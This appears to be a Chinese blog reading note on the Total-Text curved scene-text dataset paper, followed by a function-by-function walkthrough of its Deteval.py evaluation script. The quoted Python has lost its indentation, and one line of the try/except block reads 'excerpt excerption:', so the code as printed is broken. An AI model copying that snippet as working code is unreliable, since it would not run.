    ​ 多边形顶点的数量因文本实例的不同而不同。这给 Faster RCNN、SSD 和 YOLO 等检测框架带来了一个实际问题(所有这些都激发了许多场景文本检测工作),它们需要在回归目标中有固定数量的顶点。

    1.2 Optimized evaluation protocol for Total-Text

    ​ DetEval 中当前推荐的阈值没有通过包含弯曲文本进行优化。进行了一系列实验,以确定一组新的更公平评估阈值。

    1.3 Scene text detection annotation tool

    ​ 在扩展数据集时,地面实况注释是最大的瓶颈。Karatzas 等人介绍了一个注重质量控制和数据库管理的在线注释平台。然而,仅仅是平凡而艰苦的注释任务就有很大的改进空间。因此,我们在第节中介绍了全文工具(T3)。5、一种辅助注释框架,该辅助注释框架能够减少注释时间,同时获得高质量的基本事实。

    1.4 Cross dataset experiment

    ​ 在 Total Text 上训练的模型在其他场景文本数据集上表现出良好的泛化能力

    1.5 State-of-the-art analysis

    ​ 自 TotalText 出现以来,许多工作开始解决弯曲文本检测问题。

    2.1 Scene text datasets

    2.1.1 ICDAR2003-ICDAR2015

    系列数量注释特性
    2003509bbox
    2011484bbox
    2013462bbox
    20151670四边形包含任意方向,失焦

    2.1.2 MSRA-TD500

    ​ 2012,包含任意定向文本,300 训练图像,200 测试图像,使用旋转的边界框进行注释。

    2.1.3 USTB-SV1K

    ​ 从美国六个城市的街道上收集了 1000 张图像,以多方向文本为特色,用旋转的边界框进行注释。

    2.1.4 COCO-text

    ​ 2016,迄今为止最大的场景文本数据集,拥有 63686 幅图像和 173589 个标记文本区域。它主要由横向和多向文本以及少量弯曲文本组成,bbox。

    2.1.5 MLT

    ​ MLT 数据集,这是为场景文本检测、识别和脚本识别任务收集的最新多脚本数据集之一。它由 18000 个图像组成,用于训练和验证,以 9 种语言和 6 种不同的脚本为特色。

    2.1.6 CTW-12k

    ​ 2017,12000 多张,中英文。

    2.1.7 MTWI

    ​ 迄今为止最大的多语言数据集之一,拥有 20000 张图像。

    2.1.8 SynthText

    ​ 包含 80 万个场景文本图像。它的注释由单词级和字符级轴对齐的边界框及其转录组成。它的缺点是,它使用了与 COCO 文本类似的轴对齐的边界框,这不适合多方向的文本。

    2.1.9 CUTE80

    ​ 第一个突出弯曲文本的场景文本数据集,可惜只有 80 张。

    2.1.10 CTW1500

    ​ 原则上是最接近 Total Text 的数据集。Total Text 的文本实例在单词级别进行注释,而 CTW1500 的文本实例则在行级别进行注释。

    2.2 Scene text detection

    2.2.1 Scene text inspired handcrafted feature era

    ​ 场景文本的手工特征时代。

    2.2.2 The emergence of CNN

    ​ CNN 的出现。

    2.2.3 Segmentation-based scene text detection

    ​ 基于分割的场景文本检测。

    2.2.4 Proposal-based scene text detection

    ​ 基于提示的场景文本检测。

    2.2.5 Single network scene text detection

    ​ 单网络场景文本检测。

    2.2.6 Curved text detection

    ​ 曲线文本检测。

    3 The Total-Text dataset

    3.1 Dataset attributes

    3.1.1 Curved text is an overlooked problem

    ​ 水平文本的检测性能几乎达到饱和(F-score 为 0.9),但是缺乏弯曲文本。

    3.1.2 Curved text observation

    ​ 曲线不是直线。它在整个线路上不受角度变化的限制。

    3.1.3 Detection ground truth annotation

    ​ Total Text 中的文本实例是以单词级别的粒度进行注释的。

    3.1.4 Recognition ground truth annotation

    ​ 提供了单词 recognition 挑战的 GT。

    3.1.5 Segmentation ground truth annotation

    ​ 像素级的 GT 标注是最耗时的过程,我们提供了多种预处理方案。

    png

    像素级注释过程。a 输入图像补丁。bc 调整颜色阈值,使文本与背景区域分离。d–f 删除“非文本”区域。g 最终结果

    3.1.6 Orientation annotation

    具体来说,注释是这样表示的:

    • ‘h’ 表示水平文本
    • ‘m’ 表示多向文本
    • ‘c’ 表示弯曲文本

    3.1.7 Regulated polygon ground truth

    ​ 在本文中,我们使用以下方案对全文注释进行了改进。除了将多边形顶点的数量设置为 10(根据经验,10 个顶点足以紧密覆盖我们数据集中的所有单词级文本实例)

    ​ 新的多边形地面实况注释步骤如图 7 所示。首先,需要人工注释器手动选择四个不同的顶点,作为单词实例的开始和结束顶点。单词“MARLEY”(红点和绿点)上角的两个顶点将用于生成三条等距的黄色引导线。生成引导线的算法在算法 1 中进行了说明。然后,人类注释者将沿着每条黄色引导线选择一个截取点(表示为“*”),该点最能绑定单词的顶部边界。


    算法 1 在调节多边形注释过程中生成引导线的算法,emmmm 就是给个上界和下界生成三等分的点,这样文字的四个角和三条三等分的线就可以形成 10 个顶点。

    png


    3.2 Dataset statistics

    3.2.1 Strength in numbers

    ​ Total Text 分为两组:训练集和测试集,分别有 1255 张和 300 张图像。图 10 显示了 Total Text 的一系列统计信息。它总共有 11459 个带注释的文本实例,平均每个图像有7.37个实例。Total Text 中超过一半的图像具有两个不同的方向及以上,平均每个图像产生1.8个方向。

    ​ 数据集的收集也考虑到了质量,包括场景复杂性。例如类似文本和低对比度背景,不同的字体类型和大小。

    3.2.2 Orientation diversity

    ​ 大约一半的文本实例是弯曲的,另一半在水平和多向之间几乎相等地划分。尽管所有图像都是在考虑弯曲文本的情况下收集的,但其他方向仍然占据了总实例的一半。仔细观察 Total Text 可以发现,弯曲文本通常与水平文本或多方向文本一起出现。图像中文本方向的混合对文本检测算法在文本方向方面实现鲁棒性和泛化提出了挑战。

    3.2.3 Scenery diversity

    ​ Total Text 图像中的风景也很多样化。

    4 Evaluation protocol

    4.1 DetEval

    ​ Total Text 首次引入 DetEval 评估协议。然而,我们意识到,建议的 tp 和 tr 阈值,分别为 0.4 和 0.8,并没有通过在 Total text 中包含弯曲文本和多边形地面实况进行优化。

    4.2 PASCAL VOC

    ​ 与 CTW1500 和 ICDAR2015 类似,PASCAL VOC 评估方法也适用于 Total Text。

    4.3 Intersection area between polygons

    ​ 预测区域和地面实况区域之间的交集计算是 DetEval 和 Pascal VOC 评估协议的核心。

    5 Scene text detection annotation tool

    ​ 提出了一个注释工具:Total Text tool(T3),能够将注释时间减少 25%,与人类注释者的一致率为 84%。

    5.1 Total-Text-Tool

    5.2 Experiment setup

    5.3 Performance analysis

    6 Polygon-faster-RCNN

    6.1 Text line encoding method

    ​ Faster RCNN、SSD和YOLO中使用的传统回归目标 $(x_m,y_m,w,h)$ 只能用于轴对称矩形框,而不能用于多边形。

    6.1.1 Variants of Poly-FRCNN

    ​ Poly-FRCNN-5 是 3 的放大版,它在回归头中又有 10 个参数

    6.1.2 Encode

    6.1.3 Decode

    6.2 Anchor polygons parameterization

    6.3 Implementation details

    6.3.1 Feature extractor

    ​ 模型采用 Inception-Resnet-V2 作为特征提取器。

    6.3.2 Anchor boxes

    6.3.3 Loss function

    6.3.4 Training

    ​ 所有的 models 都经过了相同的训练计划。

    • 它们首先使用 ImageNet pre-trained 的权重进行初始化。

    • 然后,训练计划从 SynthText 上的 100 K 次迭代开始,然后是来自 COCO Text 的真实世界数据上的另外 100 K 次重复。最后,我们使用目标训练集对它们进行了 fine tune,以进行另外 50 K 次迭代。

    ​ 该训练计划中最大数据集(SynthText)的初始学习率设置为0.003,然后自COCO Text训练开始以来降低了0.0003,并在其余训练中保持不变。

    ​ 来自 SynthText100K 图像被随机选择用于训练的第一阶段。

    ​ 然后,在第二训练阶段期间使用来自具有至少一个可阅读文本实例的 COCO-Text 的大约 13K 个训练图像。

    ​ 最后,来自总文本训练集的 1255 幅图像被用于 fine-tuning 阶段。

    6.3.5 Testing

    ​ 这个过程尽可能简单。除了标准的非最大值抑制(NMS)外,没有使用后处理或多尺度。

    6.4 Evaluation

    6.4.1 Dataset

    ​ 我们评估了 Poly FRCNN 在 ICDAR2013、ICDAR2015 和 Total Text 上的性能。选择 ICDAR2013 和 ICDAR2015 分别演示了 PolyFRCNN 在水平文本和多方向文本上的性能。

    6.4.2 Evaluation Protocol

    ​ 使用 DetEval 方案中的建议(即 $tp=0.4$ 和 $tr=0.8$)对 ICDAR2013 报告的性能进行评估,以便与现有技术的解决方案进行公平比较。对于 Total-Text ,我们使用了 $tp=0.6$ 和 $tr=0.7$,同时,对 ICDAR2015 和 Total Text 的结果使用了 Pascal VOC 评估方法的标准$0.5\mathrm{IoU}$ 阈值。

    6.4.3 Performance analysis

    6.4.4 Box-FRCNN versus Poly-FRCNN-3

    6.4.5 Poly-Baseline versus Poly-FRCNN-3

    6.4.6 Poly-FRCNN-5

    6.4.7 Inference time

    6.4.8 Performance on other curved text datasets

    ​ 除了Total Text,我们还在其他曲线文本数据集 CUTE-80 和 CTW1500 上评估了我们提出的模型。Poly-FRCNN-3 在上述数据集上的 F-Score 分别达到 0.65 和 0.72(表5)。请注意,CUTE80 中的注释粒度不一致(即单词级别和行级别的混合),因此我们在评估之前将它们重新标记。

    6.5 Cross datasets experiment

    png

    6.5.1 Pretraining on SynthText and COCO-Text only

    ​ 仅在 SynthText 和 COCO Text 上训练的模型(表 6 中的第一行)通常比在相应数据集上进行微调的其他模型表现更差。尽管该模型的性能在 ICDAR2013 和 ICDAR2015 上仍然具有竞争力,即使没有对其进行微调;它在 Total Text 上的性能最差,与性能最好的模型(第四排)相比,在 F-Score 方面有 0.24 的大差距。

    6.5.2 Fine-tuning on ICDAR2013 and ICDAR2015

    ​ ICDAR2013 主要由水平文本组成,并使用轴对称框作为基本事实,因此,对其进行微调无助于提高其在 Total text 上的性能也就不足为奇了

    6.5.3 Fine-tuning on Total-Text

    ​ 虽然该模型仅在 Total-Text 上进行了微调,但在其他两个数据集上取得了良好的结果,这表明 Total Text 的数据足够多样化,可以用于模型的泛化。

    6.6 State-of-the-art analysis

    ​ 其他工作balabala……

    7 Conclusion

    仓库

    ​ 从 GitHub cs-chan/Total-Text-Dataset: Total Text Dataset. It consists of 1555 images with more than 3 different text orientations: Horizontal, Multi-Oriented, and Curved, one of a kind. (github.com) 里下载代码:

    png

    Annotation_tools

    png

    ​ 他们提供的一个标注工具,看样子使用 Objective-C 写的。

    ​ Total-Text-Tool (T3) is a guided annotation framework that is designed to reduce annotation time. In our experiment, T3 reduces annotation time by 25%. For more details of T3 and all related experiments, please refer to our IJDAR journal publication.

    ​ We make all three variants of T3 available.

    1. T3_v1 - the baseline version, the suggestion mechanism is not incorporated. 不带提示,完全手工
    2. T3_v2 - the suggestion mechanism is incorporated, only suggest rectangle bounding box, polygon is not suggested. 只支持 bbox
    3. T3_v3 - suggests both rectangle and polygon bounding box. 最后可以生成 bbox 和 多边形

    ​ Kindly refer to ‘T3_use_cases’ for different use cases of T3_v3.

    Baseline

    ​ 有两个模型:

    • Polygon-Faster-RCNN-3 (P3)
    • Polygon-Faster-RCNN-5 (P5)

    ​ 要预训练模型啊……好像搞不到

    Dataset

    ​ The Total-Text dataset can be downloaded at this https URL (size = 441Mb).

    Evaluation_Protocol

    ​ 这些代码是 Total Text 的官方评估协议实现。提供了两种方法:Deteval 和 Pascal VOC 协议。

    Deteval

    ​ 我们建议 $tr=0.7$ 和 $tp=0.6$ 阈值,以便使用多边形地面实况和检测格式进行更公平的评估。

    Deteval.py 代码解析:

    • 定义
    from os import listdir
    from scipy import io
    import numpy as np
    # mask counting version
    # from polygon_wrapper import iod
    # from polygon_wrapper import area_of_intersection
    # from polygon_wrapper import area

    # polygon based version
    from polygon_fast import iod
    from polygon_fast import area_of_intersection
    from polygon_fast import area
    from tqdm import tqdm

    try: # python2
    range = xrange
    excerpt excerption:
    # python3
    range = range

    """
    Input format: y0,x0, ..... yn,xn. Each detection is separated by the end of line token ('\n')'
    """

    input_dir = '../Examples/Prediction/' #detection directory goes here
    gt_dir = '../Examples/Groundtruth/' #gt directory goes here
    fid_path = '../Examples/' #output text file directory goes here

    allInputs = listdir(input_dir)
    • def input_reading_mod()
    def input_reading_mod(input_dir, input):
    """This helper reads input from txt files"""
    with open('%s/%s' % (input_dir, input), 'r', encoding='latin-1') as input_fid:
    pred = input_fid.readlines()
    det = [x.strip('\n') for x in pred]
    return det

    这是一个名为 input_reading_mod 的函数定义,它用于从文本文件中读取输入。

    函数的输入参数包括 input_dir input,分别表示输入目录和要读取的文件名。

    函数的功能是打开指定路径下的文本文件,并按照每行的格式读取文件内容。使用open函数打开文件时,通过 '%s/%s' % (input_dir, input) 的方式构建了文件的完整路径,并且指定了使用 'r' 模式以只读方式打开文件。encoding='latin-1' 参数指定了文件的编码格式为 Latin-1。

    接着,使用 readlines 方法将文件内容按行读取,并将结果存储在 pred 列表中。然后,使用列表推导式 [x.strip('\n') for x in pred] 去掉每行末尾的换行符,得到处理后的数据列表 det

    最后,函数返回 det 列表作为输出结果。

    • gt_reading_mod()
    def gt_reading_mod(gt_dir, gt_id):
    """This helper reads groundtruths from mat files"""
    gt_id = gt_id.split('.')[0]
    gt = io.loadmat('%s/poly_gt_%s.mat' % (gt_dir, gt_id))
    gt = gt['polygt']
    return gt

    这是一个名为 gt_reading_mod 的函数定义,它用于从 .mat 文件中读取标注数据。

    函数的输入参数包括 gt_dirgt_id,分别表示标注目录和要读取的文件名。

    函数的功能是首先对 gt_id 进行字符串处理,通过 .split('.')[0] 将文件名中的扩展名去除。

    然后,使用 io.loadmat 函数读取指定路径下的 .mat 文件,该文件的完整路径由'%s/poly_gt_%s.mat' % (gt_dir, gt_id)构建而成。loadmat函数将.mat文件中的数据读入到一个字典类型的变量gt中。

    接着,从字典中获取名为polygt的键值对应的数据,并将其存储在变量gt中。

    最后,函数返回gt作为输出结果。

    • detection_filtering()
    def detection_filtering(detections, groundtruths, threshold=0.5):
    for gt_id, gt in enumerate(groundtruths):
    if (gt[5] == '#') and (gt[1].shape[1] > 1):
    gt_x = list(map(int, np.squeeze(gt[1])))
    gt_y = list(map(int, np.squeeze(gt[3])))
    for det_id, detection in enumerate(detections):
    detection = detection.split(',')
    detection = list(map(int, detection))
    det_y = detection[0::2]
    det_x = detection[1::2]
    det_gt_iou = iod(det_x, det_y, gt_x, gt_y)
    if det_gt_iou > threshold:
    detections[det_id] = []

    detections[:] = [item for item in detections if item != []]
    return detections

    这是一个名为 detection_filtering 的函数定义,用于过滤掉与标注数据重叠度低的检测结果。

    函数的输入参数包括 detectionsgroundtruths,分别表示检测结果和标注数据。另外还有一个可选参数 threshold,表示重叠度的阈值,默认为 0.5。

    函数的功能是遍历所有的标注数据,对于每个标注数据,判断其是否为文字区域(gt[5] == '#')并且有多个顶点(gt[1].shape[1] > 1)。如果满足这两个条件,则将标注数据的顶点信息提取出来,分别存储在 gt_xgt_y 列表中。

    然后,遍历所有的检测结果,对于每个检测结果,先将其按逗号分隔,并将得到的字符串列表转换为整数列表。再根据坐标的奇偶性,将检测结果的 x 坐标和 y 坐标分别存储在 det_xdet_y 列表中。

    接下来,使用 iod 函数计算检测结果与标注数据之间的重叠度(Intersection over Detection)。如果重叠度大于设定的阈值,则将该检测结果从 detections 列表中移除,即将其置为空列表 []

    最后,使用列表推导式 [item for item in detections if item != []] 将不为空的检测结果重新存储到 detections 列表中。

    函数返回经过过滤后的 detections 列表作为输出结果。

    • sigma_calculation()
    def sigma_calculation(det_x, det_y, gt_x, gt_y):
    """
    sigma = inter_area / gt_area
    """
    # print(area_of_intersection(det_x, det_y, gt_x, gt_y))
    return np.round((area_of_intersection(det_x, det_y, gt_x, gt_y) / area(gt_x, gt_y)), 2)

    这是一个名为 sigma_calculation 的函数定义,用于计算检测结果与标注数据之间的重叠度。

    函数的输入参数包括 det_xdet_ygt_xgt_y,分别表示检测结果和标注数据的顶点坐标。

    函数的功能是根据以下公式计算重叠度(sigma):

    sigma = inter_area / gt_area

    其中,inter_area 表示检测结果与标注数据之间的交集区域面积,gt_area 表示标注数据的区域面积。

    函数内部通过调用两个辅助函数 area_of_intersectionarea 来计算交集区域面积和标注数据区域面积。然后将交集区域面积除以标注数据区域面积,并使用 np.round 函数将结果四舍五入到小数点后两位。

    最后,函数返回计算得到的重叠度作为输出结果。

    • tau_calculation()
    def tau_calculation(det_x, det_y, gt_x, gt_y):
    """
    tau = inter_area / det_area
    """
    return np.round((area_of_intersection(det_x, det_y, gt_x, gt_y) / area(det_x, det_y)), 2)

    这是一个名为 tau_calculation 的函数定义,用于计算检测结果与标注数据之间的重叠度。

    函数的输入参数包括 det_xdet_ygt_xgt_y,分别表示检测结果和标注数据的顶点坐标。

    函数的功能是根据以下公式计算重叠度(tau):

    tau = inter_area / det_area

    其中,inter_area 表示检测结果与标注数据之间的交集区域面积,det_area 表示检测结果的区域面积。

    函数内部通过调用两个辅助函数 area_of_intersectionarea 来计算交集区域面积和检测结果区域面积。然后将交集区域面积除以检测结果区域面积,并使用 np.round 函数将结果四舍五入到小数点后两位。

    最后,函数返回计算得到的重叠度作为输出结果。

    • 变量定义
    global_tp = 0
    global_fp = 0
    global_fn = 0
    global_sigma = []
    global_tau = []
    tr = 0.7
    tp = 0.6
    fsc_k = 0.8
    k = 2

    这段代码定义了一些全局变量 global_tpglobal_fpglobal_fnglobal_sigmaglobal_tau,并给它们分别赋初值0和空列表。

    其中,global_tp 表示全局的真正例数量(True Positive),global_fp 表示全局的假正例数量(False Positive),global_fn 表示全局的假负例数量(False Negative),global_sigma 表示全局的重叠度(sigma)列表,global_tau 表示全局的重叠度(tau)列表。

    接下来,代码定义了一些参数:tr 表示阈值,tp 表示真正例比例阈值,fsc_k 表示 F1 分数的参数 k,k 表示一个系数。

    这段代码仅仅给这些变量和参数赋了初值,并没有其他具体的逻辑操作。

    • 评估
    for input_id in tqdm(allInputs):
    if (input_id != '.DS_Store') and (input_id != 'Pascal_result.txt') and (
    input_id != 'Pascal_result_curved.txt') and (input_id != 'Pascal_result_non_curved.txt') and (input_id != 'Deteval_result.txt') and (input_id != 'Deteval_result_curved.txt') \
    and (input_id != 'Deteval_result_non_curved.txt'):
    # print(input_id)
    detections = input_reading_mod(input_dir, input_id)
    groundtruths = gt_reading_mod(gt_dir, input_id)
    detections = detection_filtering(detections, groundtruths) # filters detections overlapping with DC area
    dc_id = np.where(groundtruths[:, 5] == '#')
    groundtruths = np.delete(groundtruths, (dc_id), (0))

    local_sigma_table = np.zeros((groundtruths.shape[0], len(detections)))
    local_tau_table = np.zeros((groundtruths.shape[0], len(detections)))

    for gt_id, gt in enumerate(groundtruths):
    if len(detections) > 0:
    for det_id, detection in enumerate(detections):
    detection = detection.split(',')
    detection = list(map(int, detection))
    det_y = detection[0::2]
    det_x = detection[1::2]
    gt_x = list(map(int, np.squeeze(gt[1])))
    gt_y = list(map(int, np.squeeze(gt[3])))

    local_sigma_table[gt_id, det_id] = sigma_calculation(det_x, det_y, gt_x, gt_y)
    local_tau_table[gt_id, det_id] = tau_calculation(det_x, det_y, gt_x, gt_y)

    global_sigma.append(local_sigma_table)
    global_tau.append(local_tau_table)

    global_accumulative_recall = 0
    global_accumulative_precision = 0
    total_num_gt = 0
    total_num_det = 0

    这段代码通过一个 for 循环遍历名为 allInputs 的列表中的每个元素 input_id

    在循环内部,首先使用一系列条件语句来过滤掉一些特定的 input_id,包括 .DS_StorePascal_result.txt 等等。然后调用 input_reading_mod 函数从 input_dir 目录中读取输入数据,调用 gt_reading_mod 函数从 gt_dir 目录中读取标注数据。

    接下来,通过调用 detection_filtering 函数对检测结果进行过滤,去掉与 DC 区域重叠的检测结果。然后找到标注数据中 DC 区域对应的索引,并通过 np.delete 函数将其从标注数据中删除。

    接着,创建了两个零矩阵 local_sigma_tablelocal_tau_table,形状分别为 (groundtruths.shape[0], len(detections)),用来存储每个标注和检测结果之间的重叠度信息。

    接下来的两个嵌套的 for 循环用于计算每个标注和检测结果之间的重叠度。首先解析检测结果和标注数据的坐标信息,并调用 sigma_calculationtau_calculation 函数来计算重叠度。将计算得到的重叠度存储在 local_sigma_tablelocal_tau_table 中。

    最后,将 local_sigma_tablelocal_tau_table 分别添加到 global_sigmaglobal_tau 列表中,用于保存所有标注和检测结果之间的重叠度信息。

    代码的最后几行定义了一些变量,包括 global_accumulative_recallglobal_accumulative_precisiontotal_num_gttotal_num_det,并给它们赋初值 0。这些变量可能在后续代码中使用。

    • one_to_one()
    def one_to_one(local_sigma_table, local_tau_table, local_accumulative_recall,
    local_accumulative_precision, global_accumulative_recall, global_accumulative_precision,
    gt_flag, det_flag):
    for gt_id in range(num_gt):
    gt_matching_qualified_sigma_candidates = np.where(local_sigma_table[gt_id, :] > tr)
    gt_matching_num_qualified_sigma_candidates = gt_matching_qualified_sigma_candidates[0].shape[0]
    gt_matching_qualified_tau_candidates = np.where(local_tau_table[gt_id, :] > tp)
    gt_matching_num_qualified_tau_candidates = gt_matching_qualified_tau_candidates[0].shape[0]

    det_matching_qualified_sigma_candidates = np.where(local_sigma_table[:, gt_matching_qualified_sigma_candidates[0]] > tr)
    det_matching_num_qualified_sigma_candidates = det_matching_qualified_sigma_candidates[0].shape[0]
    det_matching_qualified_tau_candidates = np.where(local_tau_table[:, gt_matching_qualified_tau_candidates[0]] > tp)
    det_matching_num_qualified_tau_candidates = det_matching_qualified_tau_candidates[0].shape[0]


    if (gt_matching_num_qualified_sigma_candidates == 1) and (gt_matching_num_qualified_tau_candidates == 1) and \
    (det_matching_num_qualified_sigma_candidates == 1) and (det_matching_num_qualified_tau_candidates == 1):
    global_accumulative_recall = global_accumulative_recall + 1.0
    global_accumulative_precision = global_accumulative_precision + 1.0
    local_accumulative_recall = local_accumulative_recall + 1.0
    local_accumulative_precision = local_accumulative_precision + 1.0

    gt_flag[0, gt_id] = 1
    matched_det_id = np.where(local_sigma_table[gt_id, :] > tr)
    det_flag[0, matched_det_id] = 1
    return local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag, det_flag

    这段代码定义了一个名为 one_to_one 的函数,它接受多个参数,包括 local_sigma_tablelocal_tau_tablelocal_accumulative_recalllocal_accumulative_precisionglobal_accumulative_recallglobal_accumulative_precisiongt_flagdet_flag

    函数中的 for 循环遍历从 0 到 num_gt 的每个 gt_id,其中 num_gt 是标注数据的数量。

    在循环内部,首先使用 np.where 函数找到满足条件 local_sigma_table[gt_id, :] > tr 的索引,然后计算满足条件的索引数量,并分别保存在 gt_matching_num_qualified_sigma_candidatesgt_matching_qualified_tau_candidates 变量中。

    接着,再次使用 np.where 函数找到与上述条件对应的检测结果的索引,并计算满足条件的索引数量,分别保存在 det_matching_num_qualified_sigma_candidatesdet_matching_num_qualified_tau_candidates 变量中。

    之后,通过一系列的条件判断,检查是否满足"一对一"匹配的条件,即只有一个满足重叠度阈值要求的标注和一个满足重叠度阈值要求的检测结果。如果满足这些条件,则更新相关计数变量,并将相应的标志位设置为1。

    最后,函数返回更新后的 local_accumulative_recalllocal_accumulative_precisionglobal_accumulative_recallglobal_accumulative_precisiongt_flagdet_flag

    • one_to_many()
    def one_to_many(local_sigma_table, local_tau_table, local_accumulative_recall,
    local_accumulative_precision, global_accumulative_recall, global_accumulative_precision,
    gt_flag, det_flag):
    for gt_id in range(num_gt):
    #skip the following if the groundtruth was matched
    if gt_flag[0, gt_id] > 0:
    continue

    non_zero_in_sigma = np.where(local_sigma_table[gt_id, :] > 0)
    num_non_zero_in_sigma = non_zero_in_sigma[0].shape[0]

    if num_non_zero_in_sigma >= k:
    ####search for all detections that overlaps with this groundtruth
    qualified_tau_candidates = np.where((local_tau_table[gt_id, :] >= tp) & (det_flag[0, :] == 0))
    num_qualified_tau_candidates = qualified_tau_candidates[0].shape[0]

    if num_qualified_tau_candidates == 1:
    if ((local_tau_table[gt_id, qualified_tau_candidates] >= tp) and (local_sigma_table[gt_id, qualified_tau_candidates] >= tr)):
    #became an one-to-one case
    global_accumulative_recall = global_accumulative_recall + 1.0
    global_accumulative_precision = global_accumulative_precision + 1.0
    local_accumulative_recall = local_accumulative_recall + 1.0
    local_accumulative_precision = local_accumulative_precision + 1.0

    gt_flag[0, gt_id] = 1
    det_flag[0, qualified_tau_candidates] = 1
    elif (np.sum(local_sigma_table[gt_id, qualified_tau_candidates]) >= tr):
    gt_flag[0, gt_id] = 1
    det_flag[0, qualified_tau_candidates] = 1

    global_accumulative_recall = global_accumulative_recall + fsc_k
    global_accumulative_precision = global_accumulative_precision + num_qualified_tau_candidates * fsc_k

    local_accumulative_recall = local_accumulative_recall + fsc_k
    local_accumulative_precision = local_accumulative_precision + num_qualified_tau_candidates * fsc_k

    return local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag, det_flag

    这段代码定义了一个名为 one_to_many 的函数,它与之前的 one_to_one 函数类似,接受相同的参数。

    函数中的 for 循环遍历从 0 到 num_gt 的每个 gt_id,其中 num_gt 是标注数据的数量。

    在循环内部,首先检查是否已经匹配过该标注数据,如果 gt_flag[0, gt_id] 大于 0,则表示已进行匹配,直接跳过后续操作。

    接下来,使用 np.where 函数找到满足条件 local_sigma_table[gt_id, :] > 0 的索引,并计算满足条件的索引数量,保存在 num_non_zero_in_sigma 变量中。

    然后,如果满足条件 num_non_zero_in_sigma >= k,进入下一步操作。

    在下一步操作中,通过np.where函数找到满足条件 (local_tau_table[gt_id, :] >= tp) & (det_flag[0, :] == 0) 的索引,并计算满足条件的索引数量,保存在 num_qualified_tau_candidates 变量中。

    接着,判断 num_qualified_tau_candidates 的值,如果为 1,则进一步判断该标注和对应的检测结果是否满足"一对一"匹配的条件,即重叠度要求同时满足。如果满足条件,则更新相关计数变量,并将相应的标志位设置为1。

    如果 num_qualified_tau_candidates 的值大于 1,并且满足条件 np.sum(local_sigma_table[gt_id, qualified_tau_candidates]) >= tr,则将相关计数变量更新,并将标志位设置为 1。

    最后,函数返回更新后的 local_accumulative_recalllocal_accumulative_precisionglobal_accumulative_recallglobal_accumulative_precisiongt_flagdet_flag

    • many_to_one()
    def many_to_one(local_sigma_table, local_tau_table, local_accumulative_recall,
    local_accumulative_precision, global_accumulative_recall, global_accumulative_precision,
    gt_flag, det_flag):
    for det_id in range(num_det):
    # skip the following if the detection was matched
    if det_flag[0, det_id] > 0:
    continue

    non_zero_in_tau = np.where(local_tau_table[:, det_id] > 0)
    num_non_zero_in_tau = non_zero_in_tau[0].shape[0]

    if num_non_zero_in_tau >= k:
    ####search for all detections that overlaps with this groundtruth
    qualified_sigma_candidates = np.where((local_sigma_table[:, det_id] >= tp) & (gt_flag[0, :] == 0))
    num_qualified_sigma_candidates = qualified_sigma_candidates[0].shape[0]

    if num_qualified_sigma_candidates == 1:
    if ((local_tau_table[qualified_sigma_candidates, det_id] >= tp) and (local_sigma_table[qualified_sigma_candidates, det_id] >= tr)):
    #became an one-to-one case
    global_accumulative_recall = global_accumulative_recall + 1.0
    global_accumulative_precision = global_accumulative_precision + 1.0
    local_accumulative_recall = local_accumulative_recall + 1.0
    local_accumulative_precision = local_accumulative_precision + 1.0

    gt_flag[0, qualified_sigma_candidates] = 1
    det_flag[0, det_id] = 1
    elif (np.sum(local_tau_table[qualified_sigma_candidates, det_id]) >= tp):
    det_flag[0, det_id] = 1
    gt_flag[0, qualified_sigma_candidates] = 1

    global_accumulative_recall = global_accumulative_recall + num_qualified_sigma_candidates * fsc_k
    global_accumulative_precision = global_accumulative_precision + fsc_k

    local_accumulative_recall = local_accumulative_recall + num_qualified_sigma_candidates * fsc_k
    local_accumulative_precision = local_accumulative_precision + fsc_k
    return local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, gt_flag, det_flag

    这段代码定义了一个名为 many_to_one 的函数,与之前的 one_to_oneone_to_many 函数类似,接受相同的参数。

    函数中的 for 循环遍历从 0 到 num_det 的每个 det_id,其中 num_det 是检测结果的数量。

    在循环内部,首先检查是否已经匹配过该检测结果,如果 det_flag[0, det_id] 大于 0,则表示已进行匹配,直接跳过后续操作。

    接下来,使用 np.where 函数找到满足条件 local_tau_table[:, det_id] > 0 的索引,并计算满足条件的索引数量,保存在 num_non_zero_in_tau 变量中。

    然后,如果满足条件 num_non_zero_in_tau >= k,进入下一步操作。

    在下一步操作中,通过 np.where 函数找到满足条件 (local_sigma_table[:, det_id] >= tp) & (gt_flag[0, :] == 0) 的索引,并计算满足条件的索引数量,保存在 num_qualified_sigma_candidates 变量中。

    接着,判断 num_qualified_sigma_candidates 的值,如果为 1,则进一步判断该检测结果和对应的标注数据是否满足"一对一"匹配的条件,即重叠度和重合度要求同时满足。如果满足条件,则更新相关计数变量,并将相应的标志位设置为 1。

    如果 num_qualified_sigma_candidates 的值大于 1,并且满足条件 np.sum(local_tau_table[qualified_sigma_candidates, det_id]) >= tp,则将相关计数变量更新,并将标志位设置为 1。

    最后,函数返回更新后的 local_accumulative_recalllocal_accumulative_precisionglobal_accumulative_recallglobal_accumulative_precisiongt_flagdet_flag

    • 保存结果
    for idx in range(len(global_sigma)):
    print(allInputs[idx])
    local_sigma_table = global_sigma[idx]
    local_tau_table = global_tau[idx]

    num_gt = local_sigma_table.shape[0]
    num_det = local_sigma_table.shape[1]

    total_num_gt = total_num_gt + num_gt
    total_num_det = total_num_det + num_det

    local_accumulative_recall = 0
    local_accumulative_precision = 0
    gt_flag = np.zeros((1, num_gt))
    det_flag = np.zeros((1, num_det))

    #######first check for one-to-one case##########
    local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, \
    gt_flag, det_flag = one_to_one(local_sigma_table, local_tau_table,
    local_accumulative_recall, local_accumulative_precision,
    global_accumulative_recall, global_accumulative_precision,
    gt_flag, det_flag)

    #######then check for one-to-many case##########
    local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, \
    gt_flag, det_flag = one_to_many(local_sigma_table, local_tau_table,
    local_accumulative_recall, local_accumulative_precision,
    global_accumulative_recall, global_accumulative_precision,
    gt_flag, det_flag)

    #######then check for many-to-one case##########
    local_accumulative_recall, local_accumulative_precision, global_accumulative_recall, global_accumulative_precision, \
    gt_flag, det_flag = many_to_one(local_sigma_table, local_tau_table,
    local_accumulative_recall, local_accumulative_precision,
    global_accumulative_recall, global_accumulative_precision,
    gt_flag, det_flag)




    fid = open(fid_path, 'a+')
    try:
